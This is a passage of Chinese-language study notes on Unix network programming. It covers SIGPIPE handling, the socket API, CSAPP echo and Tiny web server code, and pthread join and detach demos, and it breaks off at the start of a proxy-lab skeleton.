 * The message is formatted by hand and emitted with write(), because printf()
 * is not async-signal-safe and must not be called from a signal handler.
 * errno is saved and restored so the interrupted write() in the main flow
 * still reports its own error code.
 *
 * Note: write() bypasses the stdio buffer, so when stdout is not a terminal
 * this line can appear ahead of text still buffered by earlier printf() calls.
 */
void handle(int sig) // signal handler
{
    static const char prefix[] = "SIGPIPE : ";
    char msg[sizeof prefix + 12]; /* prefix + sign + up to 10 digits + '\n' */
    char digits[10];
    size_t len = 0;
    size_t ndigits = 0;
    int saved_errno = errno;
    unsigned int magnitude = (sig < 0) ? 0u - (unsigned int)sig : (unsigned int)sig;

    for (size_t i = 0; i + 1 < sizeof prefix; i++)
    {
        msg[len++] = prefix[i];
    }
    if (sig < 0)
    {
        msg[len++] = '-';
    }

    /* Produce the decimal digits least-significant first, then reverse them. */
    do
    {
        digits[ndigits++] = (char)('0' + magnitude % 10u);
        magnitude /= 10u;
    } while (magnitude != 0u);
    while (ndigits > 0)
    {
        msg[len++] = digits[--ndigits];
    }
    msg[len++] = '\n';

    if (write(STDOUT_FILENO, msg, len) < 0)
    {
        /* Nothing async-signal-safe can be done about a failed report. */
    }
    errno = saved_errno;
}

/*
 * Writes two short messages to fd, one after the other.
 *
 * In the SIGPIPE demo the peer has already closed the connection: the first
 * write is expected to succeed (the peer answers it with an RST), and the
 * second write is the one expected to fail and raise SIGPIPE.
 *
 * The outcome of each write is reported on stdout; a failure of the first
 * write is reported as well instead of being silently ignored.
 */
void mysendmsg(int fd)
{
    // first message
    const char *msg1 = "first msg";
    ssize_t n = write(fd, msg1, strlen(msg1));

    if (n > 0) // first message written; the server then receives the client's RST
    {
        printf("success write %zd bytes\n", n);
    }
    else if (n < 0)
    {
        printf("write error: %s\n", strerror(errno));
    }

    // second message: this write is the one that triggers SIGPIPE
    const char *msg2 = "second msg";
    n = write(fd, msg2, strlen(msg2));
    if (n < 0)
    {
        printf("write error: %s\n", strerror(errno));
    }
}
/*
 * SIGPIPE demo server: installs the SIGPIPE handler, accepts a single TCP
 * connection and calls mysendmsg() on it.
 *
 * Every socket call is now checked (the original only checked accept()),
 * and both descriptors are closed before returning.
 */
int main()
{
    signal(SIGPIPE , handle); /* register the SIGPIPE handler */

    struct sockaddr_in server_addr;

    bzero(&server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    /* NOTE(review): `port` is not defined in this listing and the client
       listing uses `PORT`; confirm both name the same value. */
    server_addr.sin_port = htons(port);

    int listenfd = socket(AF_INET , SOCK_STREAM , 0);
    if(listenfd < 0)
    {
        perror("socket");
        exit(1);
    }

    /* Assign the local address to listenfd. */
    if(bind(listenfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0)
    {
        perror("bind");
        close(listenfd);
        exit(1);
    }

    /* Put listenfd into the passive, listening state. */
    if(listen(listenfd, 128) < 0)
    {
        perror("listen");
        close(listenfd);
        exit(1);
    }

    /* Block until a client connects; fd is the connected descriptor. */
    int fd = accept(listenfd, NULL, NULL);
    if(fd < 0)
    {
        perror("accept");
        close(listenfd);
        exit(1);
    }

    mysendmsg(fd);

    close(fd);
    close(listenfd);
    return 0;
}

客户端代码：

/*
 * SIGPIPE demo client: connects to the demo server on this machine and
 * immediately shuts the connection down in both directions, so that the
 * server's subsequent writes hit a closed peer.
 *
 * Changes from the original listing: the unused `buf` (which was also
 * initialised with the character '0' rather than zero) and the unused `n`
 * are gone, the destination is the loopback address instead of INADDR_ANY
 * (connecting to the wildcard address is not portable), and the socket is
 * closed explicitly.
 */
int main()
{
    int sockfd;
    struct sockaddr_in seraddr;

    bzero(&seraddr,sizeof(seraddr));
    seraddr.sin_family = AF_INET;
    seraddr.sin_port = htons(PORT);
    seraddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    //socket()
    if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket");
        exit(-1);
    }
    //connect()
    if(connect(sockfd,(struct sockaddr *)&seraddr,sizeof(seraddr)) == -1)
    {
        /* Could not establish a connection to the server at seraddr. */
        perror("connect");
        close(sockfd);
        exit(-1);
    }

    /* Disable both receiving and sending on sockfd. */
    int ret = shutdown(sockfd , SHUT_RDWR);
    if(ret < 0)
    {
        perror("shutdown perror");
    }

    close(sockfd);
    return 0;
}

结果：

依次触发：write_msg1，handle，write_msg2

此外，因为SIGPIPE信号的默认行为是结束进程，而我们绝对不希望因为写操作的错误而导致程序退出，尤其是作为服务器程序来说就更恶劣了。所以我们应该对这种信号加以处理，在这里，介绍两种处理SIGPIPE信号的方式：

给SIGPIPE设置SIG_IGN信号处理函数，忽略该信号：

1	signal(SIGPIPE, SIG_IGN);

前文说过，引发SIGPIPE信号的写操作将设置errno为EPIPE，所以，第二次往关闭的socket中写入数据时，会返回-1，同时errno置为EPIPE，这样，便能知道对端已经关闭，然后进行相应处理，而不会导致整个进程退出

使用send函数的MSG_NOSIGNAL标志来禁止写操作触发SIGPIPE信号：

1	send(sockfd , buf , size , MSG_NOSIGNAL);

同样，我们可以根据send函数反馈的errno来判断socket的读端是否已经关闭

此外，我们也可以通过IO复用函数来检测管道和socket连接的读端是否已经关闭，以POLL为例，当socket连接被对方关闭时，socket上的POLLRDHUP事件将被触发

SIGURG信号

内核通知应用程序带外数据到达的方式有两种：

一种就是利用ＩＯ复用技术的系统调用（如select）在接受到带外数据时将返回，并向应用程序报告socket上的异常事件
另一种方法就是使用SIGURG信号

参考：网络编程的三个重要信号

套接字接口

套接字接口（socket interface）是一组函数，它们和 Unix I/O 函数结合起来，用以创建网络应用

大多数现代系统上都实现套接字接口，包括所有的 Unix 变种、Windows 和 Macintosh 系统

// 从 Linux 内核的角度来看，一个套接字就是 通信的一个端点 ，从 Linux 程序的角度来看，套接字就是一个 有相应描述符的打开文件

因特网的套接字地址存放在所示的类型为 sockaddr_in 的 16 字节结构中（IP 地址和端口号总是以网络字节顺序（大端法）存放的）

下面将介绍套接字接口中的部分函数：

int socket(int domain, int type, int protocol);
// domain：即协议域，又称为协议族（family）
// type：指定socket类型
// protocol：指定协议

// 协议族决定了 socket 的地址类型，在通信中必须采用对应的地址

socket 函数 用于来返回一个 套接字描述符 （clientfd）

套接字描述符：用来标定系统为当前的进程划分的一块缓冲空间，类似于文件描述符
文件描述符：是内核为了高效管理已被打开的文件所创建的索引，用于指代被打开的文件，对文件所有 I/O 操作相关的系统调用都需要通过文件描述符（open的返回值fd）

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
// sockfd：需要绑定的socket
// *addr：存放了服务端用于通信的地址和端口
// addrlen: sizeof(sockaddr_in)

bind 函数 告诉内核将 addr 中的服务器套接字地址和套接字描述符 sockfd 联系起来

// bind函数把一个本地协议地址赋予一个套接字

1
2
3

int connect(int clientfd, const struct sockaddr *addr, socklen_t addrlen);
// clientfd：套接字描述符的一种
// addrlen：sizeof(sockaddr_in)

connect 函数 试图与 “套接字地址为 addr 的服务器” 建立一个因特网连接

如果成功，clientfd 描述符现在就准备好可以读写了(最好用 getaddrinfo 来为 connect 提供参数)

1
2
3

int listen(int sockfd, int backlog);
// sockfd：需要绑定的socket
// backlog：暗示了内核在开始拒绝连接请求之前，队列中要排队的未完成的连接请求的数量

listen 函数 将 sockfd 从一个 主动套接字 转化为一个 监听套接字 （listening socket），该套接字可以接受来自客户端的连接请求

int accept(int listenfd, struct sockaddr *addr, int *addrlen);
// listenfd：服务器的socket描述符
// *addr：指向struct sockaddr *的指针
// *addrlen：协议地址的长度

accept 函数 等待来自客户端的连接请求到达侦听描述符 listenfd，然后在 addr 中填写客户端的套接字地址，并返回一个 已连接描述符

一个服务器通常仅仅只创建一个监听socket描述字，内核为每个由服务器进程接受的客户连接创建了一个已连接socket描述字，当服务器完成了对某个客户的服务，相应的已连接socket描述字就被关闭

int getaddrinfo(const char *host, const char *service,
                const struct addrinfo *hints,
                struct addrinfo **result);
// host & service：套接字地址的两个组成部分
// 可选的参数 hints 是一个 addrinfo 结构，它提供对 getaddrinfo 返回的套接字地址列表的更好的控制
// getaddrinfo 返回 result，result 是一个指向 addrinfo 结构的链表

void freeaddrinfo(struct addrinfo *result);
const char *gai_strerror(int errcode); // 返回：错误消息

getaddrinfo 函数 将主机名、主机地址、服务名和端口号的字符串表示转化成套接字地址结构，它是已弃用的 gethostbyname 和 getservbyname 函数的新的替代品

在客户端调用了 getaddrinfo 之后，会遍历这个列表，依次尝试每个套接字地址，直到调用 socket 和 connect 成功，建立起连接，类似地，服务器会尝试遍历列表中的每个套接字地址，直到调用 socket 和 bind 成功，描述符会被绑定到一个合法的套接字地址，

为了避免内存泄漏，应用程序必须在最后调用 freeaddrinfo，释放该链表
如果 getaddrinfo 返回非零的错误代码，应用程序可以调用 gai_strerror，将该代码转换成消息字符串

/*
 * Element of the linked list that getaddrinfo hands back through its
 * `result` argument; the same structure type is used for the optional
 * `hints` argument.  Entries are chained through ai_next.
 */
struct addrinfo {
    int             ai_flags;      /* Hints argument flags */
    int             ai_family;     /* First arg to socket function */
    int             ai_socktype;   /* Second arg to socket function */
    int             ai_protocol;   /* Third arg to socket function */
    char            *ai_canonname; /* Canonical hostname */
    size_t          ai_addrlen;    /* Size of ai_addr struct */
    struct sockaddr *ai_addr;      /* Ptr to socket address structure */
    struct addrinfo *ai_next;      /* Ptr to next item in linked list */
};

int getnameinfo(const struct sockaddr *sa, socklen_t salen,
                char *host, size_t hostlen,
                char *service, size_t servlen, int flags);
// *sa：指向大小为 salen 字节的套接字地址结构
// *host 指向大小为 hostlen 字节的缓冲区
// *service 指向大小为 servlen 字节的缓冲区
// 参数 flags 是一个位掩码，能够修改默认的行为

getnameinfo 函数 和 getaddrinfo 是相反的，将一个套接字地址结构转换成相应的主机和服务名字符串，它是已弃用的 gethostbyaddr 和 getservbyport 函数的新的替代品

1
2
3

int open_clientfd(char *hostname, char *port);
// *hostname：服务器运行的地址
// *port：指向端口

客户端调用 open_clientfd 建立与服务器的连接

open_clientfd 函数 建立与服务器的连接，该服务器运行在主机 hostname 上，并在端口号 port 上监听连接请求

int open_listenfd(char *port); // port：指向端口号字符串

open_listenfd 函数 打开和返回一个监听描述符，这个描述符准备好在端口 port 接收连接请求

echo 客户端案例：

#include "csapp.h"

/*
 * Echo client.  Usage: <prog> <host> <port>.
 * Connects to the server, then repeatedly reads a line from standard
 * input, sends it, reads one line back and prints it, until Fgets
 * returns NULL.
 */
int main(int argc, char **argv)
{
    int clientfd;
    char *host, *port, buf[MAXLINE];
    rio_t rio;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
        exit(0);
    }
    host = argv[1];
    port = argv[2];

    clientfd = Open_clientfd(host, port);
    /* Connect to the server running on `host` and listening on `port`. */
    Rio_readinitb(&rio, clientfd);
    /* Associate descriptor clientfd with the read buffer at rio. */

    while (Fgets(buf, MAXLINE, stdin) != NULL) {
        /* One line has been read from standard input into buf. */
        Rio_writen(clientfd, buf, strlen(buf));
        /* Send strlen(buf) bytes starting at buf to clientfd. */
        Rio_readlineb(&rio, buf, MAXLINE);
        /* Read the next text line (newline included, at most MAXLINE-1
           bytes) into buf and terminate it with a NUL character. */
        Fputs(buf, stdout);
        /* Print the echoed line on standard output. */
    }
    Close(clientfd);
    exit(0);
}

在和服务器建立连接之后，客户端进入一个循环，反复从标准输入读取文本行，发送文本行给服务器，从服务器读取回送的行，并输出结果到标准输出

当 fgets 在标准输入上遇到 EOF 时，或者因为用户在键盘上键入 Ctrl+D，或者因为在一个重定向的输入文件中用尽了所有的文本行时，循环就终止

echo 服务器案例：

#include "csapp.h"

void echo(int connfd);

/*
 * Iterative echo server.  Usage: <prog> <port>.
 * Accepts one connection at a time, prints the peer's host and service
 * strings, serves it with echo() and closes it before accepting the next.
 */
int main(int argc, char **argv)
{
    int listenfd, connfd;
    socklen_t clientlen;
    struct sockaddr_storage clientaddr; /* Enough space for any address */
    char client_hostname[MAXLINE], client_port[MAXLINE];

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(0);
    }
    
    listenfd = Open_listenfd(argv[1]);
    /* Listening descriptor ready to receive connection requests on port argv[1]. */
    while (1) {
        clientlen = sizeof(struct sockaddr_storage);
        connfd = Accept(listenfd, (SA *)&clientaddr, &clientlen);
        /* Wait for a connection request on listenfd; the client's socket
           address is stored in clientaddr and connfd is the connected
           descriptor. */
        Getnameinfo((SA *) &clientaddr, clientlen, client_hostname, MAXLINE,
                    client_port, MAXLINE, 0);
        /* Convert the socket address into host and service name strings. */
        printf("Connected to (%s, %s)\n", client_hostname, client_port);
        /* Report who connected. */ 
        echo(connfd);
        /* Serve this client. */
        Close(connfd);
    }
    exit(0);
}

/*
 * Echo loop for one connection: every line read from connfd is logged by
 * size on standard output and written back to connfd unchanged.  The loop
 * ends when the line reader returns 0.
 *
 * connfd: connected descriptor of the client being served.
 */
void echo(int connfd)
{
    rio_t reader;
    char line[MAXLINE];

    /* Bind the buffered reader to the connection. */
    Rio_readinitb(&reader, connfd);

    for (;;) {
        size_t len = Rio_readlineb(&reader, line, MAXLINE);
        if (len == 0)
            break;
        printf("server received %d bytes\n", (int)len);
        /* Send the same bytes back to the client. */
        Rio_writen(connfd, line, len);
    }
}

在打开监听描述符后，它进入一个无限循环，每次循环都等待一个来自客户端的连接请求，输出已连接客户端的主机名和端口号，并调用 echo 函数为这些客户端服务，在 echo 程序返回后，主程序关闭已连接描述符，一旦客户端和服务器关闭了它们各自的描述符，连接也就终止了

echo函数将反复读写文本行，直到rio_readlineb函数遇到EOF

参考：Socket原理讲解

多线程编程

多线程是多任务处理的一种特殊形式，多任务处理允许让电脑同时运行两个或两个以上的程序，一般情况下，有两种类型的多任务处理：基于进程和基于线程

基于进程的多任务处理是程序的并发执行
基于线程的多任务处理是同一程序的片段的并发执行

多线程程序包含可以同时运行的两个或多个部分，这样的程序中的每个部分称为一个线程，每个线程定义了一个单独的执行路径

C语言中有专门控制线程的函数：

创建新线程

1	pthread_create (thread, attr, start_routine, arg);

thread：指向线程标识符的指针
attr：一个不透明的属性对象，可以被用来设置线程属性，您可以指定线程属性对象，也可以使用默认值 NULL
start_routine：线程运行函数起始地址，一旦线程被创建就会执行（通常设置为某个函数）
arg：运行函数的参数，它必须通过把引用作为指针强制转换为 void * 类型进行传递，如果没有传递参数，则使用 NULL

pthread_create 创建一个新的线程，并让它可执行目标函数

终止线程

1	pthread_exit (status);

显式地退出一个线程，通常情况下，pthread_exit() 函数是在线程完成工作后无需继续存在时被调用，如果 main() 是在它所创建的线程之前结束，并通过 pthread_exit() 退出，那么其他线程将继续执行，否则，它们将在 main() 结束时自动被终止

连接和分离线程

pthread_join (threadid, status);
pthread_detach (threadid);

pthread_join() 阻塞等待线程退出（直到指定的 threadid 线程终止为止），获取线程退出状态
pthread_detach() 表示主线程与子线程（threadid）分离，两者相互不干涉，子线程结束同时子线程的资源自动回收

当创建一个线程时，它的某个属性会定义它是否是可连接的（joinable）或可分离的（detached），只有创建时定义为可连接的线程才可以被连接，如果线程创建时被定义为可分离的，则它永远也不能被连接；pthread_join() 函数用来等待线程的完成

// pthread库不是Linux系统默认的库，链接时需要使用库libpthread.a, 在使用pthread_create创建线程时，在编译中要加-lpthread参数:

1	gcc test.c -lpthread -o test

案例：pthread_join

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <pthread.h>

/* Record passed to the worker thread; thrd_func fills in every field. */
typedef struct {
    char ch;       /* single character set by the thread */
    int var;       /* integer set by the thread */
    char str[64];  /* NUL-terminated text set by the thread */
}th_t;

/*
 * Thread entry point for the pthread_join demo.
 *
 * arg: pointer to a th_t owned by the caller.  The thread fills it in,
 * prints a success line and exits, passing the same pointer back as its
 * exit status.
 */
void* thrd_func(void* arg) {
    th_t* out = arg;

    out->ch = 'm';
    out->var = 200;
    strcpy(out->str, "my thread");
    puts("success!!!");

    /* Explicit thread exit; the value is what pthread_join receives. */
    pthread_exit(out);
}

/*
 * pthread_join demo: allocates a th_t, lets a worker thread fill it in,
 * waits for the worker and prints what it wrote.
 *
 * Compared with the original listing, the malloc() and pthread_join()
 * results are checked, and the buffer is no longer dereferenced before
 * it is known to be valid.
 */
int main(void) {

    pthread_t tid;
    int ret;
    th_t* retval = malloc(sizeof *retval);

    if (retval == NULL) {
        perror("malloc");
        exit(1);
    }

    ret = pthread_create(&tid, NULL, thrd_func, (void*)retval);
    if (ret != 0) {
        fprintf(stderr, "pthread_create error:%s\n", strerror(ret));
        free(retval);
        exit(1); // terminates the whole process
    }

    /* Block until the thread ends and fetch its exit value. */
    /* Commenting this call out gives the second result shown after this listing. */
    ret = pthread_join(tid, (void**)&retval);
    if (ret != 0) {
        fprintf(stderr, "pthread_join error:%s\n", strerror(ret));
        exit(1);
    }

    printf("ch = %c, var = %d, str = %s\n", retval->ch, retval->var, retval->str);
    free(retval);
    retval = NULL;

    /* Only the main thread exits here, so any other threads still running
       keep going; a plain return would end the whole process. */
    pthread_exit((void*)1);
}

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
success!!!
ch = m, var = 200, str = my thread

把“pthread_join(tid, (void **)&retval)”注释掉以后：

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
ch = , var = 0, str = 
success!!!

发现主线程和副线程的执行次序改变了（主副线程同时执行，但是主线程先操作“retval”变量）

添加了“pthread_join”后，主线程就会被阻塞，直到标识符“tid”代表的副线程终止后，主线程才开始执行（需要副线程先给“retval”变量赋值后，主线程才可以打印出来）

案例：pthread_detach

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <pthread.h>


/*
 * Thread entry point for the pthread_detach demo: prints one line and
 * exits with status 77.
 *
 * arg: unused.
 */
void* thrd_func(void* arg)
{
    (void)arg;
    fputs("i am detach.\n", stdout);
    pthread_exit((void*)77);
}

/*
 * pthread_detach demo: starts a thread, detaches it, sleeps for a second
 * and prints the process id and the main thread's id.
 */
int main(void)
{
    pthread_t tid;
    int ret;

    ret = pthread_create(&tid, NULL, thrd_func, NULL);
    if (ret != 0) {
        fprintf(stderr, "pthread_create error:%s\n", strerror(ret));
        exit(1);
    }

    /* Detach the thread: its exit status is no longer collected by another
       thread, and its resources are released when it terminates. */
    ret = pthread_detach(tid);

    if (ret != 0) {
        fprintf(stderr, "pthread_detach error:%s\n", strerror(ret));
        exit(1);
    }

    sleep(1);
    printf("main pid=%d, tid=%lu\n", getpid(), pthread_self());
    pthread_exit((void*)0);
}

➜  [/home/ywhkkx/桌面] gcc test.c -lpthread -o test
➜  [/home/ywhkkx/桌面] ./test                      
i am detach.
main pid=3830, tid=140138689746752

线程可以被置为 detach 状态，这样的线程一旦终止就立刻回收它占用的所有资源，而不保留终止状态，不能对一个已经处于detach状态的线程调用pthread_join，这样的调用将返回EINVAL错误

参考：C语言多线程操作

实验一：实现顺序web代理

实现一个顺序执行的代理，它可以处理GET方法并转发，对于其他方法可以不实现

命令行调用 “./proxy < port >” 来启动代理服务器，其中 port 可以通过实验包中的工具 port-for-user 来获取

测试服务器

运行该服务器，指定一个端口，必须是1024–49151之间的端口，其余端口不能使用

1	➜ [/home/ywhkkx/proxylab-handout/tiny] ./tiny 1444

在运行了TINY 服务器的基础上，打开另一个terminal，在linux shell输入：

➜  [/home/ywhkkx/proxylab-handout/tiny] telnet localhost 1444
     telnet localhost 1444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /home.html HTTP/1.0

HTTP/1.0 200 OK /* 200表示成功获取 */
Server: Tiny Web Server
Content-length: 120
Content-type: text/html

<html> // 获取的内容
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html> 
Connection closed by foreign host.

此时服务端的内容：

1
2
3

➜  [/home/ywhkkx/proxylab-handout/tiny] ./tiny 1444
Accepted connection from (ip6-localhost, 47590) // 打印了用户信息
GET /home.html HTTP/1.0

理解服务器代码

#include "csapp.h"

void doit(int fd);
void read_requesthdrs(rio_t* rp);
int parse_uri(char* uri, char* filename, char* cgiargs);
void serve_static(int fd, char* filename, int filesize);
void get_filetype(char* filename, char* filetype);
void serve_dynamic(int fd, char* filename, char* cgiargs);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);

/*
 * Tiny web server entry point.  Usage: <prog> <port>.
 * Opens a listening descriptor and then serves connections one at a time:
 * accept, print the peer, run doit(), close.
 */
int main(int argc, char** argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    listenfd = Open_listenfd(argv[1]);
    /* Listening descriptor ready to receive connection requests on port argv[1]. */
    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen); 
        /* Wait for a connection request on listenfd; the client's socket
           address is stored in clientaddr and connfd is the connected
           descriptor. */
        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        /* Convert the socket address into host and service name strings. */
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        /* Report who connected. */ 
        doit(connfd);        
        /* Handle one HTTP transaction. */
        Close(connfd);           
        /* Close the connection. */
    }
}

/*
 * Handles one HTTP transaction on fd.
 * Reads the request line, rejects anything but GET with 501, skips the
 * request headers, maps the URI to a file and then serves it either as
 * static content or by running it as a CGI program.  Missing files get a
 * 404 and files with unsuitable type or permissions a 403.
 */
void doit(int fd)
{
    int is_static;
    struct stat sbuf; /* file attributes filled in by stat() */
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    char filename[MAXLINE], cgiargs[MAXLINE];
    rio_t rio;

    Rio_readinitb(&rio, fd);
     /* Associate descriptor fd with the read buffer at rio. */
    if (!Rio_readlineb(&rio, buf, MAXLINE)) 
        return;
    /* The request line (newline included, at most MAXLINE-1 bytes) is now
       in buf; a zero result means there was nothing to read. */
    printf("%s", buf);
    /* Log the request line. */
    sscanf(buf, "%s %s %s", method, uri, version);       
    /* Split it into method, URI and version. */
    if (strcasecmp(method, "GET")) {                     
        clienterror(fd, method, "501", "Not Implemented",
            "Tiny does not implement this method");
        return;
    }                                                   
    read_requesthdrs(&rio); 
    /* Read and discard the request headers. */

    is_static = parse_uri(uri, filename, cgiargs); 
    /* Parse the URI: file name goes to filename, CGI arguments to cgiargs. */
    if (stat(filename, &sbuf) < 0) {  
        /* stat() fills sbuf with the file's metadata; a negative result
           means the file could not be examined. */
        clienterror(fd, filename, "404", "Not found",
            "Tiny couldn't find this file");
        /* Tell the client about the error. */
        return;
    }                                                   

    if (is_static) { 
        if (!(S_ISREG(sbuf.st_mode)) || !(S_IRUSR & sbuf.st_mode)) { 
            /* Must be a regular file with owner read permission. */
            clienterror(fd, filename, "403", "Forbidden",
                "Tiny couldn't read the file");
            return;
        }
        serve_static(fd, filename, sbuf.st_size);  
        /* Serve static content (send the file). */
    }
    else {
        if (!(S_ISREG(sbuf.st_mode)) || !(S_IXUSR & sbuf.st_mode)) { 
            /* Must be a regular file with owner execute permission. */
            clienterror(fd, filename, "403", "Forbidden",
                "Tiny couldn't run the CGI program");
            return;
        }
        serve_dynamic(fd, filename, cgiargs);       
        /* Serve dynamic content (run the CGI program). */
    }
}

/*
 * Reads and echoes request header lines from rp until the blank line
 * ("\r\n") that ends the header section.
 *
 * The loop also stops when the reader returns 0 or less.  The original
 * ignored that result, so a peer that closed the connection before
 * sending the blank line left the buffer unchanged and the loop spinning
 * forever.
 *
 * rp: buffered reader positioned just after the request line.
 */
void read_requesthdrs(rio_t* rp)
{
    char buf[MAXLINE];

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        printf("%s", buf);
        if (!strcmp(buf, "\r\n"))
            break;
    }
}

/*
 * Splits a request URI into a file name and CGI arguments.
 *
 * uri:      request URI; for dynamic content it is truncated in place at '?'.
 * filename: receives "." followed by the URI path; a static URI ending in
 *           '/' additionally gets "home.html" appended.
 * cgiargs:  receives the text after '?' for dynamic content, else "".
 *
 * Returns 1 for static content and 0 for dynamic content (any URI that
 * contains "cgi-bin").
 *
 * An empty URI no longer indexes uri[-1]; it simply yields "." as the
 * file name.  The caller must supply buffers large enough for the
 * results; no bounds are checked here.
 */
int parse_uri(char* uri, char* filename, char* cgiargs)
{
    char* query;
    size_t uri_len;

    if (!strstr(uri, "cgi-bin")) {
        /* Static content */
        strcpy(cgiargs, "");
        strcpy(filename, ".");
        strcat(filename, uri);
        uri_len = strlen(uri);
        if (uri_len > 0 && uri[uri_len - 1] == '/')
            strcat(filename, "home.html");
        return 1;
    }

    /* Dynamic content: everything after '?' is the argument string. */
    query = strchr(uri, '?');
    if (query) {
        strcpy(cgiargs, query + 1);
        *query = '\0';
    }
    else
        strcpy(cgiargs, "");
    strcpy(filename, ".");
    strcat(filename, uri);
    return 0;
}

/*
 * Sends a static file to the client.
 * Writes the response headers (status line, Server, Content-length,
 * Content-type) to fd, then maps the first filesize bytes of filename
 * into memory at srcp and writes that region to fd.
 */
void serve_static(int fd, char* filename, int filesize)
{
    int srcfd;
    char* srcp, filetype[MAXLINE], buf[MAXBUF];
    
    get_filetype(filename, filetype);   
    /* Derive the content type from the file name. */
    sprintf(buf, "HTTP/1.0 200 OK\r\n"); 
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Server: Tiny Web Server\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-length: %d\r\n", filesize);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: %s\r\n\r\n", filetype);
    Rio_writen(fd, buf, strlen(buf));   

    srcfd = Open(filename, O_RDONLY, 0); 
    /* Open the requested file read-only. */
    srcp = Mmap(0, filesize, PROT_READ, MAP_PRIVATE, srcfd, 0); 
    /* Map filesize bytes of srcfd, readable and private (copy-on-write),
       at an address chosen by the system. */
    Close(srcfd);                       
    Rio_writen(fd, srcp, filesize);    
    /* Write the mapped file contents to fd. */
    Munmap(srcp, filesize);   
    /* Remove the mapping. */
}

/*
 * Picks a MIME type for filename and copies it into filetype.
 *
 * The first table entry whose extension text occurs anywhere in filename
 * wins; if none matches, the type is "text/plain".
 */
void get_filetype(char* filename, char* filetype)
{
    static const char* const known[][2] = {
        { ".html", "text/html"  },
        { ".gif",  "image/gif"  },
        { ".png",  "image/png"  },
        { ".jpg",  "image/jpeg" },
    };
    const char* mime = "text/plain";
    size_t i;

    for (i = 0; i < sizeof known / sizeof known[0]; i++) {
        if (strstr(filename, known[i][0])) {
            mime = known[i][1];
            break;
        }
    }
    strcpy(filetype, mime);
}

/*
 * Serves dynamic content: after sending the first part of the response,
 * forks a child that runs the CGI program filename with its standard
 * output redirected to the client, while the parent waits.
 */
void serve_dynamic(int fd, char* filename, char* cgiargs)
{
    char buf[MAXLINE], * emptylist[] = { NULL };

    sprintf(buf, "HTTP/1.0 200 OK\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Server: Tiny Web Server\r\n");
    Rio_writen(fd, buf, strlen(buf));

    if (Fork() == 0) { 
        /* fork returns the child's pid in the parent and 0 in the child,
           so this branch runs in the child. */
        setenv("QUERY_STRING", cgiargs, 1); /* pass the arguments via QUERY_STRING */
        Dup2(fd, STDOUT_FILENO); /* redirect standard output to the connected descriptor */         
        Execve(filename, emptylist, environ); /* load and run the CGI program */
    }
    Wait(NULL); /* the parent blocks here until the child has finished */
}

/*
 * Sends an HTTP error response to the client on fd.
 * errnum and shortmsg form the status line; longmsg and cause are shown
 * in the HTML body.
 */
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE];

    /* HTTP response headers */
    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n\r\n");
    Rio_writen(fd, buf, strlen(buf));

    /* HTTP response body */
    sprintf(buf, "<html><title>Tiny Error</title>");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<body bgcolor=""ffffff"">\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<hr><em>The Tiny Web server</em>\r\n");
    Rio_writen(fd, buf, strlen(buf));
}

Tiny是一个迭代服务器，监听在命令行中确定的端口上的连接请求，在通过 open_listenfd 函数打开一个监听套接字以后，Tiny执行典型的无限服务循环，反复地接受一个连接(accept)请求，执行事务(doit)，最后关闭连接描述符(close)

编写代理

用户在代理中输入指令，代理会解析指令并发送到服务器，同时它也会接收服务器上的反馈，并返回给用户

先抄 TINY 的框架：

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
/* Fixed header lines that build_requesthdrs appends to every forwarded request. */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";

/* NOTE(review): doit() calls build_requesthdrs(), which has no prototype
   here, and thread() is declared but not used by this sequential version. */
void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
